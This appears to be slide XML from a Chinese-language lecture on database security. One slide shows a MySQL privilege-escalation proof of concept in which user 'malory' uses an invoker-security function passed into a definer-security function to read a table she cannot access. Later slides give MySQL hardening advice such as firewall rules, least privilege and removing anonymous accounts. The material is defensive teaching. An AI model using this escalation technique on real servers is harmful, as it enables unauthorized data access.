              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>, localhost, malory,,mysqltest1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> don't have access to mysqltest2.t1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>--error ER_TABLEACCESS_DENIED_ERROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select * from mysqltest2.t1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Create function which will allow to exploit security hole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>delimiter |;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> security invoker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>set @a:= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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810740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a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>权限提升及安全限制绕过漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE1D7103-0C46-4FF2-8044-89787B1CFC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="983432" y="1484784"/>
            <a:ext cx="5256584" cy="384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zh-CN" sz="1200" dirty="0"/>
              <a:t>set @b:= (select count(*) from mysqltest2.t1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>end|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>delimiter ;|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Again correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>--error ER_TABLEACCESS_DENIED_ERROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select @a, @b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Oops!!! it seems that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>() is executed in the context of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>() definer, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@locahost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> gets all info that he wants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>test.f_suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select @a, @b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>connection default;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop database mysqltest1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop database mysqltest2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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053848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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>限制访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>端口的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>防火墙来限制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>下可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>来限制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:Iptables -R INPUT 1 -s 192.168.0.1 -j ACCEPT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>允许某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>的端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>下可以修改配置文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>my.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>来实现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>可以修改配置文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>my.cnf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>来实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>默认端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>port=3306</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>对所有用户设置强密码并严格指定对应账号的访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>中可在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>表中指定用户的访问可访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>特权账号的处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>建议给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>账号设置强密码，并指定只容许本地登录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>日志的处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>如需要可开启查询日志，查询日志会记录登录和查询语句。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>删除无用数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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相关安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="759642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Mysql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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>只授予账号必须的权限：一般不要赋予用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>all privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限，如果有误操作，将会产生非常严重的后果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>删除匿名帐号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>     在某些版本中，安装完毕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>后，会自动安装一个空帐号，此账号具有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库的全部权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>PROCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SUPER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限授予管理员以外的账号</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Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>相关安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990635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gn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>安全控制机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="4653280" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>用户管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="335" dirty="0">
